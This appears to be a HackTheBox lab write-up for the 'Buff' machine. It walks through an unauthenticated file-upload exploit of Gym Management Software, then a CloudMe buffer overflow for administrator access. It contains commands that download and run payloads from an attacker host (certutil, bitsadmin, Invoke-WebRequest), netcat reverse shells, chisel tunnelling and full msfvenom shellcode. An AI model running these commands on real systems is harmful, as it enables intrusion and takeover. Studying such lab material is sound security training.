xsspresso
xsspresso
WriteupsHTB — Buff
WebEasyWindows

HTB — Buff

Gym Management Software RCE via unauthenticated file upload. CloudMe buffer overflow with port forwarding for privilege escalation.

January 15, 2025HackTheBox
#File Upload#RCE#Buffer Overflow#Port Forwarding

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.198
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 08:47 EST
Nmap scan report for 10.10.10.198
Host is up (0.022s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
 
TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   20.00 ms 10.10.14.1
2   20.10 ms 10.10.10.198
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.79 seconds

8080/tcp open http

sh
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: mrb3n's Bro Hut

Gym Management Software 1.0

  • https://www.exploit-db.com/exploits/48506
  • need to include at the end / forward slash otherwise will cause errors
sh
python2 48506.py 'http://10.10.10.198:8080/'
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/
 
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

stable shell

sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe > rev.exe
cmd
certutil.exe -f -urlcache -split http://10.10.14.6/rev.exe rev.exe
powershell
powershel.exe Invoke-WebRequest http://10.10.14.6/rev.exe -OutFile rev.exe
cmd
bitsadmin.exe /transfer n http://10.10.14.6/rev.exe rev.exe
sh
certutil.exe -verifyctl -split -f http://10.10.14.6/rev.exe

sh
curl http://10.10.14.6/nc.exe -o C:\Users\Shaun\nc.exe
sh
C:\xampp\htdocs\gym\upload> C:\Users\shaun\nc 10.10.14.6 443 -e cmd
sh
nc -lnvp 443 
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.198] 49923
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

user.txt

cmd
C:\Users\shaun\Desktop>type user.txt
type user.txt
0068038a...

priv esc

cmd
certutil.exe -f -urlcache -split http://10.10.14.6/winPEASx64.exe winPEASx64.exe
cmd
Invoke-WebRequest http://10.10.14.6/winPEASx64.exe -OutFile winPEASx64.exe
powershell
PS C:\Users\shaun> Invoke-WebRequest http://10.10.14.6/winPEASx64.exe -OutFile winPEASx64.exe
powershell
PS C:\Users\shaun> .\winPEASx64.exe
powershell
 
����������͹ Current TCP Listening Ports
� Check for services restricted from the outside 
  Enumerating IPv4 connections
 
  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name
             System
  TCP        10.10.10.198          8080          10.10.14.6            58748           Established       3228            C:\xampp\apache\bin\httpd.exe
  TCP        10.10.10.198          49923         10.10.14.6            443             Established       4684            C:\Users\shaun\nc.exe
  TCP        127.0.0.1             3306          0.0.0.0               0               Listening         8624            C:\xampp\mysql\bin\mysqld.exe
  TCP        127.0.0.1             8888          0.0.0.0               0               Listening         5280            CloudMe
cmd
Invoke-WebRequest http://10.10.14.6/winPEASany.exe -OutFile winPEASany.exe

CloudMe 1.11.2

  • https://www.exploit-db.com/exploits/48389
cmd
Invoke-WebRequest http://10.10.14.6/chisel.exe -OutFile chisel.exe
sh
./chisel server --reverse --port 1234
powershell
PS C:\Users\shaun> ./chisel.exe client 10.10.14.6:1234 R:8888:127.0.0.1:8888 R:3306:127.0.0.1:3306
sh
nmap -sC -sV -p8888 127.0.0.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 16:55 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000031s latency).
 
PORT     STATE SERVICE    VERSION
8888/tcp open  tcpwrapped
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds
  • run msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1235 -b '\x00\x0A\x0D' -f python
  • pase the values
python
#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1235 -b '\x00\x0A\x0D' -f python
payload =  b""
payload += b"\xda\xd4\xd9\x74\x24\xf4\x58\xbd\xb4\xf0\xcd\x42"
payload += b"\x33\xc9\xb1\x52\x31\x68\x17\x83\xc0\x04\x03\xdc"
payload += b"\xe3\x2f\xb7\xe0\xec\x32\x38\x18\xed\x52\xb0\xfd"
payload += b"\xdc\x52\xa6\x76\x4e\x63\xac\xda\x63\x08\xe0\xce"
payload += b"\xf0\x7c\x2d\xe1\xb1\xcb\x0b\xcc\x42\x67\x6f\x4f"
payload += b"\xc1\x7a\xbc\xaf\xf8\xb4\xb1\xae\x3d\xa8\x38\xe2"
payload += b"\x96\xa6\xef\x12\x92\xf3\x33\x99\xe8\x12\x34\x7e"
payload += b"\xb8\x15\x15\xd1\xb2\x4f\xb5\xd0\x17\xe4\xfc\xca"
payload += b"\x74\xc1\xb7\x61\x4e\xbd\x49\xa3\x9e\x3e\xe5\x8a"
payload += b"\x2e\xcd\xf7\xcb\x89\x2e\x82\x25\xea\xd3\x95\xf2"
payload += b"\x90\x0f\x13\xe0\x33\xdb\x83\xcc\xc2\x08\x55\x87"
payload += b"\xc9\xe5\x11\xcf\xcd\xf8\xf6\x64\xe9\x71\xf9\xaa"
payload += b"\x7b\xc1\xde\x6e\x27\x91\x7f\x37\x8d\x74\x7f\x27"
payload += b"\x6e\x28\x25\x2c\x83\x3d\x54\x6f\xcc\xf2\x55\x8f"
payload += b"\x0c\x9d\xee\xfc\x3e\x02\x45\x6a\x73\xcb\x43\x6d"
payload += b"\x74\xe6\x34\xe1\x8b\x09\x45\x28\x48\x5d\x15\x42"
payload += b"\x79\xde\xfe\x92\x86\x0b\x50\xc2\x28\xe4\x11\xb2"
payload += b"\x88\x54\xfa\xd8\x06\x8a\x1a\xe3\xcc\xa3\xb1\x1e"
payload += b"\x87\xc1\x4f\x2e\x51\xbe\x4d\x2e\x59\xed\xdb\xc8"
payload += b"\x0b\x01\x8a\x43\xa4\xb8\x97\x1f\x55\x44\x02\x5a"
payload += b"\x55\xce\xa1\x9b\x18\x27\xcf\x8f\xcd\xc7\x9a\xed"
payload += b"\x58\xd7\x30\x99\x07\x4a\xdf\x59\x41\x77\x48\x0e"
payload += b"\x06\x49\x81\xda\xba\xf0\x3b\xf8\x46\x64\x03\xb8"
payload += b"\x9c\x55\x8a\x41\x50\xe1\xa8\x51\xac\xea\xf4\x05"
payload += b"\x60\xbd\xa2\xf3\xc6\x17\x05\xad\x90\xc4\xcf\x39"
payload += b"\x64\x27\xd0\x3f\x69\x62\xa6\xdf\xd8\xdb\xff\xe0"
payload += b"\xd5\x8b\xf7\x99\x0b\x2c\xf7\x70\x88\x5c\xb2\xd8"
payload += b"\xb9\xf4\x1b\x89\xfb\x98\x9b\x64\x3f\xa5\x1f\x8c"
payload += b"\xc0\x52\x3f\xe5\xc5\x1f\x87\x16\xb4\x30\x62\x18"
payload += b"\x6b\x30\xa7"
  • run the exploit
sh
python2 cloudme_bof.py
sh
nc -lvnp 1235
listening on [any] 1235 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.198] 49959
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
whoami
buff\administrator

root.txt

cmd
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ac49c42a...

Up next

EasyJan 2025

HTB — Devvortex

Joomla CVE-2023-23752 info disclosure leaks database creds. Authenticated template RCE for shell. Apport crash handler sudo exploit for root.

Read writeup
EasyJan 2025

HTB — Love

SSRF on a voting system bypasses firewall to reach internal file analysis service. PHP file upload for RCE, AlwaysInstallElevated for SYSTEM.

Read writeup
EasyJan 2025

HTB — Mailing

hMailServer path traversal leaks admin hash. Outlook CVE-2024-21413 moniker link attack for NTLM relay, WinPEAS finds privesc vector.

Read writeup